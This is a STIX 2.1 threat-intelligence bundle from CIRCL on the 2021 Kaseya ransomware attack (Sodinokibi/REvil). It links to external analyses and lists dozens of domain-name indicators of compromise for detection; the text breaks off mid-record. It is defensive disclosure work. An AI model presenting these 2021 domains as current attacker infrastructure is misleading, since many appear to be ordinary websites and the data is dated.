{ "type": "bundle", "id": "bundle--e0eaf6f2-a12c-4b31-9d19-f77faf1ea4c9", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-07T09:35:07.000Z", "modified": "2021-07-07T09:35:07.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--e0eaf6f2-a12c-4b31-9d19-f77faf1ea4c9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-07T09:35:07.000Z", "modified": "2021-07-07T09:35:07.000Z", "name": "Kaseya ransomware attack - indicators and information publicly available", "published": "2021-07-07T09:47:39Z", "object_refs": [ "observed-data--0e569e9a-17bd-4af6-b785-f83596b7a97a", "url--0e569e9a-17bd-4af6-b785-f83596b7a97a", "observed-data--89531d9a-c947-4bd8-a84c-68b4e89d2446", "url--89531d9a-c947-4bd8-a84c-68b4e89d2446", "indicator--580a5488-69c5-4019-83e1-02879ea0ac22", "indicator--d1092ff9-f976-4029-9c29-7af01d6759b2", "indicator--34d82c52-13de-4f37-9a70-336feae63b6a", "indicator--5b08c28f-2d33-4075-b8b2-a8cea74dafa5", "indicator--6c041cd6-b04e-4130-9aed-3140d3f3b78b", "indicator--02484f6e-c50d-4b26-bdd2-aa14c3ebab2e", "indicator--1ae94e8f-be1f-487f-81d6-cd519663ddef", "indicator--da43a1ec-a1b6-441c-8ea5-48d64cc8e226", "indicator--75c79264-1974-4aa2-b2c6-480ec8e7970d", "indicator--3da15a87-1fb3-4d69-aa35-3efa20b7c701", "indicator--5ae32a41-e5ad-49a0-934f-a0adc913c7d9", "indicator--ec97ce8b-b674-4689-8720-5100614bcbbb", "indicator--b5135450-e1fc-4c49-991a-f3042d3f21cf", "indicator--93d7c230-354b-4378-bb4b-9c9d5fc76265", "indicator--58593514-a54d-4eeb-807d-a9d448bac80f", "indicator--aa9d2ada-9102-4ab7-a846-2c53f53db035", "indicator--27fbdd1c-83e3-421a-bb3b-ae83c8bd24c2", "indicator--085927fc-1a26-43a9-878e-e6ba9aff2869", "indicator--d403cb96-0385-4ded-ae2d-2d9c80445eb2", "indicator--b5946dfb-7a24-471c-b661-150a3f67c2e6", "indicator--a6382aea-9681-4d3c-b031-cedb56900b78", 
"indicator--7e14c5bd-5522-4085-8de9-67885ef022cf", "indicator--bca4585a-5cb3-45c1-956b-5516f184be9c", "indicator--2429561d-6b7a-46d3-9d6d-13a0bd99409b", "indicator--57fc5262-d25d-4c17-b714-8caa54a91e36", "indicator--7128f692-5453-41ea-9ee3-f3aa47802b39", "indicator--9cdaccaa-2179-439f-8579-5e8f26e12c92", "indicator--c4024a8b-c8ea-4cdf-aba7-084fdf316969", "indicator--32018026-7020-45fa-8e1d-c835a796fa9b", "indicator--e5faad77-39b0-4d55-b83c-e35302d03d21", "indicator--5e62790f-3493-449c-acb1-d4adfab3f4a9", "indicator--46272f67-9303-4f9b-acf0-97ea54e7eae2", "indicator--7c089669-43c3-42d9-8c2c-7f3d717281aa", "indicator--a489899c-c4f4-46dd-a596-f9d165cc75f9", "indicator--cc0a65b6-d4ac-4486-afb1-da22800a25bd", "indicator--dfac7576-54ff-41ec-a759-a4e362fd78e3", "indicator--b1c574bc-446c-437d-ac2f-31fe56889df8", "indicator--bbdf4eb4-3f5f-435e-81a3-27eeea6ab88b", "indicator--38f1ecc6-4e89-40db-a826-c2eda523f946", "indicator--3275524c-6128-4a8e-86c5-3aa90362f9e3", "indicator--9c0ffa35-e772-4341-b04b-8c63a3385982", "indicator--0dedcd10-8c29-4647-80f1-8eca7d58bef2", "indicator--575f1379-0074-410a-9433-49b8b9958118", "observed-data--10036ce7-76fb-44b5-95ec-aa98744391b2", "url--10036ce7-76fb-44b5-95ec-aa98744391b2", "observed-data--0a0a5eaa-39aa-474e-91f7-16818eb45441", "url--0a0a5eaa-39aa-474e-91f7-16818eb45441", "indicator--86947a18-f1ed-4ef9-bdfc-cd6d5f586179", "indicator--83cac77f-3395-4e66-8748-4a3c93f13f9f", "indicator--0bb49474-a26d-448c-a5fe-6a646bae941d", "indicator--94d2a666-8901-4fdd-b637-12cd14214ed9", "indicator--382db752-d40a-44b4-8043-8ed41ad534df", "x-misp-object--f5e08151-622f-4b0f-9a5f-3b329b8da50c", "indicator--b5e68470-eac8-4708-9c02-bd24d67639d9", "x-misp-object--6b906ba0-33c1-4070-8962-49359d7ab1e1", "x-misp-object--66a1099e-fc17-4447-a35a-671d1dce2b3a", "indicator--b86e6a60-1bc6-4b06-9816-7d253d8136af", "indicator--92efa833-8ea8-49ee-9d46-5fedbf946d46", "indicator--22682f05-d593-4378-983c-e247b5f6df07", "indicator--f1a24c1c-d479-447e-abbe-dfc97c485829", 
"indicator--e0115c11-ab7d-4d4c-a7a2-078a8dc6b6dd", "indicator--80fca50b-89b9-4331-9b9a-6a62e7080126", "indicator--e489c678-49cd-4f79-a70b-9b3de81bd252", "indicator--a855e025-6cbb-4c93-9585-95121ea5c55c", "x-misp-object--f42f63de-36c2-41d3-86d1-d1e3e3508da1", "x-misp-object--67af034f-5173-445b-ae08-1f1a7e9a7f87", "x-misp-object--e6a7fd5d-ff89-4a3f-840f-892e99de748b", "x-misp-object--cd7445c8-4121-45e1-a294-121ec9d35d8e", "x-misp-object--f722ecce-fb4e-44f6-a2ed-f40f4fd96f11", "x-misp-object--0ff15772-0b74-45a7-b805-f2a4363639d1", "relationship--1b551a7c-1d52-497a-8eb7-ddc39717c2a1", "relationship--f1e68dce-2415-4c97-8dc5-8462985248dc", "relationship--3154082f-b1cd-4d18-8139-e5a25682aa21", "relationship--4d8d7fa4-3bea-4bf9-97e0-d585b262980a", "relationship--1a3e175a-43e5-4c38-bd6f-6c657acd3785", "relationship--a37c72bd-2565-4cae-93f4-f56a5b57d4d7", "relationship--975070c8-f353-432c-9f2d-9c7383661ec0" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "type:OSINT", "osint:lifetime=\"perpetual\"", "osint:certainty=\"50\"", "misp-galaxy:ransomware=\"Sodinokibi\"", "misp-galaxy:mitre-attack-pattern=\"Data Encrypted for Impact - T1486\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--0e569e9a-17bd-4af6-b785-f83596b7a97a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:00:04.000Z", "modified": "2021-07-05T08:00:04.000Z", "first_observed": "2021-07-05T08:00:04Z", "last_observed": "2021-07-05T08:00:04Z", "number_observed": 1, "object_refs": [ "url--0e569e9a-17bd-4af6-b785-f83596b7a97a" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--0e569e9a-17bd-4af6-b785-f83596b7a97a", "value": "https://twitter.com/r3c0nst/status/1411922502553673728" }, { "type": "observed-data", "spec_version": "2.1", "id": 
"observed-data--89531d9a-c947-4bd8-a84c-68b4e89d2446", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:05:55.000Z", "modified": "2021-07-05T08:05:55.000Z", "first_observed": "2021-07-05T08:05:55Z", "last_observed": "2021-07-05T08:05:55Z", "number_observed": 1, "object_refs": [ "url--89531d9a-c947-4bd8-a84c-68b4e89d2446" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--89531d9a-c947-4bd8-a84c-68b4e89d2446", "value": "https://github.com/cado-security/DFIR_Resources_REvil_Kaseya" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--580a5488-69c5-4019-83e1-02879ea0ac22", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = 'ncuccr.org']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d1092ff9-f976-4029-9c29-7af01d6759b2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = '1team.es']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--34d82c52-13de-4f37-9a70-336feae63b6a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", 
"modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = '4net.guru']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5b08c28f-2d33-4075-b8b2-a8cea74dafa5", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = '35-40konkatsu.net']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--6c041cd6-b04e-4130-9aed-3140d3f3b78b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:43.000Z", "modified": "2021-07-05T08:10:43.000Z", "pattern": "[domain-name:value = '123vrachi.ru']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--02484f6e-c50d-4b26-bdd2-aa14c3ebab2e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '4youbeautysalon.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { 
"kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--1ae94e8f-be1f-487f-81d6-cd519663ddef", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '12starhd.online']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--da43a1ec-a1b6-441c-8ea5-48d64cc8e226", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '101gowrie.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--75c79264-1974-4aa2-b2c6-480ec8e7970d", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '8449nohate.org']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", 
"id": "indicator--3da15a87-1fb3-4d69-aa35-3efa20b7c701", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '1kbk.com.ua']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ae32a41-e5ad-49a0-934f-a0adc913c7d9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '365questions.org']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--ec97ce8b-b674-4689-8720-5100614bcbbb", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = '321play.com.hk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b5135450-e1fc-4c49-991a-f3042d3f21cf", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": 
"[domain-name:value = 'candyhouseusa.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--93d7c230-354b-4378-bb4b-9c9d5fc76265", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'andersongilmour.co.uk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--58593514-a54d-4eeb-807d-a9d448bac80f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'facettenreich27.de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--aa9d2ada-9102-4ab7-a846-2c53f53db035", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'blgr.be']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network 
activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--27fbdd1c-83e3-421a-bb3b-ae83c8bd24c2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'fannmedias.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--085927fc-1a26-43a9-878e-e6ba9aff2869", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'southeasternacademyofprosthodontics.org']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d403cb96-0385-4ded-ae2d-2d9c80445eb2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'filmstreamingvfcomplet.be']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": 
"indicator--b5946dfb-7a24-471c-b661-150a3f67c2e6", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'smartypractice.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--a6382aea-9681-4d3c-b031-cedb56900b78", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'tanzschule-kieber.de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--7e14c5bd-5522-4085-8de9-67885ef022cf", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'iqbalscientific.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--bca4585a-5cb3-45c1-956b-5516f184be9c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": 
"[domain-name:value = 'pasvenska.se']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--2429561d-6b7a-46d3-9d6d-13a0bd99409b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'cursosgratuitosnainternet.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--57fc5262-d25d-4c17-b714-8caa54a91e36", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'bierensgebakkramen.nl']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--7128f692-5453-41ea-9ee3-f3aa47802b39", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'c2e-poitiers.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", 
"phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9cdaccaa-2179-439f-8579-5e8f26e12c92", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'gonzalezfornes.es']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--c4024a8b-c8ea-4cdf-aba7-084fdf316969", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'tonelektro.nl']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--32018026-7020-45fa-8e1d-c835a796fa9b", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'milestoneshows.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": 
"indicator--e5faad77-39b0-4d55-b83c-e35302d03d21", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'blossombeyond50.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5e62790f-3493-449c-acb1-d4adfab3f4a9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'thomasvicino.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--46272f67-9303-4f9b-acf0-97ea54e7eae2", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'kaotikkustomz.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--7c089669-43c3-42d9-8c2c-7f3d717281aa", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": 
"[domain-name:value = 'mindpackstudios.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--a489899c-c4f4-46dd-a596-f9d165cc75f9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'faroairporttransfers.net']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--cc0a65b6-d4ac-4486-afb1-da22800a25bd", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'daklesa.de']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--dfac7576-54ff-41ec-a759-a4e362fd78e3", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:10:44.000Z", "modified": "2021-07-05T08:10:44.000Z", "pattern": "[domain-name:value = 'bxdf.info']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2021-07-05T08:10:44Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network 
